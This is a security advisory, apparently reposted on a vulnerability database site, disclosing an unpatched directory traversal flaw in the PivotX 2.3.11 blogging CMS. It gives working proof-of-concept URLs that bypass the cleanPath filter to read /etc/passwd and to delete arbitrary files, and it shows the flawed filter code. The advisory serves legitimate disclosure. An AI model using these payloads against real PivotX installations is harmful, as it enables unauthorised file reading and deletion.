PivotX 2.3.11 - Directory Traversal

2016.03.18
Credit: Tim Coen
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Security Advisory - Curesec Research Team 1. Introduction Affected Product: PivotX 2.3.11 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pivotx.net/ Vulnerability Type: Directory Traversal Remote Exploitable: Yes Reported to vendor: 01/20/2016 Disclosed to public: 03/15/2016 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to Directory Traversal, allowing authenticated users to read and delete files outside of the PivotX directory. 3. Details Description CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N The function cleanPath which is responsible for sanitizing path names can be bypassed by an attacker, leading to directory traversal in multiple places. Proof of Concept Admins and Superadmins can read any file: http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir= L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../ /.....//...//.....//...//.....//...//.....//...//etc/passwd Advanced users, Admins and Superadmins can delete any file, possibly leading to DOS: http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../ /.....//...//.....//...//.....//...//.....//...//.....//...//important/ important.file&pivotxsession=ovyyn4ob2jc5ym92 Code lib.php function cleanPath($path) { $path = str_replace('../', '', $path); $path = str_replace('..\', '', $path); $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path); return $path; } 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 01/20/2016 Informed Vendor about Issue 01/29/2016 Vendor replies, PivotX is not maintained anymore 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany

References:

https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top